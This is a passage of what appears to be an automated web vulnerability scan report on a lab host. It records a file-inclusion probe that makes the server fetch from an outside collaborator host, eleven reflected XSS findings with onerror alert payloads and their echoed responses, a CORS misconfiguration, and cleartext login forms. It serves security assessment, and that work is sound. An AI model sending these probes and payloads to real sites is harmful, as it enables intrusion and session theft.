GET /contactus.php?f=http%3a%2f%2fa9k2e37z36j226d1tfh328gcv31v3jt7kuaiz.burpcollaborator.net%2f%3fcontact.txt HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:52 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1611
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
<td>&lt;html&gt;&lt;body&gt;kxtlooz8obw3n86ggdx6w7zjkugigjfigz&lt;/body&gt;&lt;/html&gt;</td>
...[SNIP]...

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 128.39.113.1 at 2017-nov-08 11:47:52 UTC.

Request to Collaborator

GET /?contact.txt HTTP/1.0
Host: a9k2e37z36j226d1tfh328gcv31v3jt7kuaiz.burpcollaborator.net
Connection: close

Response from Collaborator

HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 60

<html><body>kxtlooz8obw3n86ggdx6w7zjkugigjfigz</body></html>
1.5. Cross-site scripting (reflected)

There are 11 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.5.1. http://10.250.200.5:81/register [username parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The value of the username request parameter is copied into the HTML document as plain text between tags. The payload ar4wi<img src=a onerror=alert(1)>tjjqg was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

POST /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/register
Content-Type: multipart/form-data; boundary=--------952112201
Content-Length: 965
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

----------952112201
Content-Disposition: form-data; name="password"


----------952112201
Content-Disposition: form-data; name="website"


----------952112201
Content-Disposition: form-data;
...[SNIP]...
ntent-Disposition: form-data; name="pgpid"


----------952112201
Content-Disposition: form-data; name="primaryschool"


----------952112201
Content-Disposition: form-data; name="username"

ar4wi<img src=a onerror=alert(1)>tjjqg
----------952112201
Content-Disposition: form-data; name="highschool"


----------952112201--

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:39 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2455
Connection: close
Content-Type: text/html; charset=UTF-8

array (
0 => 'ar4wi<img src=a onerror=alert(1)>tjjqg',
1 => '',
2 => '',
3 => '',
4 => '',
5 => '',
6 => '',
7 => '',
)Error: User creation failed<!DOCTYPE html>
<html lang="en">

<he
...[SNIP]...
1.5.2. http://10.250.200.5:81/user/jyoti.ermine/key.asc [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload kd6zj<img src=a onerror=alert(1)>wl3nl was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/jyoti.ermine/key.asckd6zj%3cimg%20src%3da%20onerror%3dalert(1)%3ewl3nl HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:06:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.asckd6zj<img src=a onerror=alert(1)>wl3nl
1.5.3. http://10.250.200.5:81/user/jyoti.ermine/me.jpg [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload lbfv1<img src=a onerror=alert(1)>ysenk was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/jyoti.ermine/me.jpglbfv1%3cimg%20src%3da%20onerror%3dalert(1)%3eysenk HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:06:46 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpglbfv1<img src=a onerror=alert(1)>ysenk
1.5.4. http://10.250.200.5:81/user/marge.aphrodite/key.asc [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload tuhe6<img src=a onerror=alert(1)>tv7tx was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/marge.aphrodite/key.asctuhe6%3cimg%20src%3da%20onerror%3dalert(1)%3etv7tx HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:15:19 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.asctuhe6<img src=a onerror=alert(1)>tv7tx
1.5.5. http://10.250.200.5:81/user/marge.aphrodite/me.jpg [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload dlykp<img src=a onerror=alert(1)>c18sg was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/marge.aphrodite/me.jpgdlykp%3cimg%20src%3da%20onerror%3dalert(1)%3ec18sg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:19:49 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpgdlykp<img src=a onerror=alert(1)>c18sg
1.5.6. http://10.250.200.5:81/user/rica.orpah/key.asc [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload u55va<img src=a onerror=alert(1)>gkymr was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/rica.orpah/key.ascu55va%3cimg%20src%3da%20onerror%3dalert(1)%3egkymr HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:28:24 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.ascu55va<img src=a onerror=alert(1)>gkymr
1.5.7. http://10.250.200.5:81/user/rica.orpah/me.jpg [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload z619j<img src=a onerror=alert(1)>yxar1 was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/rica.orpah/me.jpgz619j%3cimg%20src%3da%20onerror%3dalert(1)%3eyxar1 HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:28:28 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpgz619j<img src=a onerror=alert(1)>yxar1
1.5.8. http://10.250.200.5:81/user/ricca.gilud/key.asc [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload e2liw<img src=a onerror=alert(1)>qz3ab was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/ricca.gilud/key.asce2liw%3cimg%20src%3da%20onerror%3dalert(1)%3eqz3ab HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:28:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.asce2liw<img src=a onerror=alert(1)>qz3ab
1.5.9. http://10.250.200.5:81/user/ricca.gilud/me.jpg [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload h8z7a<img src=a onerror=alert(1)>vlc45 was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/ricca.gilud/me.jpgh8z7a%3cimg%20src%3da%20onerror%3dalert(1)%3evlc45 HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:31:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpgh8z7a<img src=a onerror=alert(1)>vlc45
1.5.10. http://10.250.200.5:81/user/stephi.fonda/key.asc [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload ea6kp<img src=a onerror=alert(1)>ct53e was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/stephi.fonda/key.ascea6kp%3cimg%20src%3da%20onerror%3dalert(1)%3ect53e HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:40:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.ascea6kp<img src=a onerror=alert(1)>ct53e
1.5.11. http://10.250.200.5:81/user/stephi.fonda/me.jpg [URL path filename]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload dplwp<img src=a onerror=alert(1)>s4oqf was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/stephi.fonda/me.jpgdplwp%3cimg%20src%3da%20onerror%3dalert(1)%3es4oqf HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:40:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpgdplwp<img src=a onerror=alert(1)>s4oqf
1.6. Cross-origin resource sharing: arbitrary origin trusted

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-json/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://pzmsygxefydq.com

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Issue background

An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.

If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.

Issue remediation

Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.

Request 1

GET /wp-json/ HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+
Origin: http://pzmsygxefydq.com

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
X-Robots-Tag: noindex
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization
Allow: GET
Access-Control-Allow-Origin: http://pzmsygxefydq.com
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Credentials: true
Content-Length: 998
Connection: close
Content-Type: application/json; charset=UTF-8

{"name":"Fairweather & sons","description":"Just another WordPress site","url":"http:\/\/10.250.200.5","home":"http:\/\/10.250.200.5","namespaces":["oembed\/1.0"],"authentication":[],"routes":{"\/":{"
...[SNIP]...
1.7. Cleartext submission of password

There are 4 instances of this issue:

Issue background

Some applications transmit passwords over unencrypted connections, making them vulnerable to interception. To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Issue remediation

Applications should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.



1.7.1. http://10.250.200.5/wp-login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The page contains a form whose action URL is submitted over clear-text HTTP, and the form contains a password field. Both the form action and the password input are shown in the form markup in Response 1 below.

Request 1

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2193
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
</h1>
   
<form name="loginform" id="loginform" action="http://10.250.200.5/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
...[SNIP]...
1.7.2. http://10.250.200.5:81/login

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /login

Issue detail

The page contains a form whose action URL is submitted over clear-text HTTP, and the form contains a password field. The form (which has no action attribute, so it submits to the page's own clear-text URL) and the password input are shown in the form markup in Response 1 below.

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:59 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 882
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/css/style.css" rel="st
...[SNIP]...
<body>
<form method="post">
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" value="Log in">
...[SNIP]...
1.7.3. http://10.250.200.5:81/register

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The page contains a form whose action URL is submitted over clear-text HTTP, and the form contains a password field. The form (which has no action attribute, so it submits to the page's own clear-text URL) and the password input are shown in the form markup in Response 1 below.

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
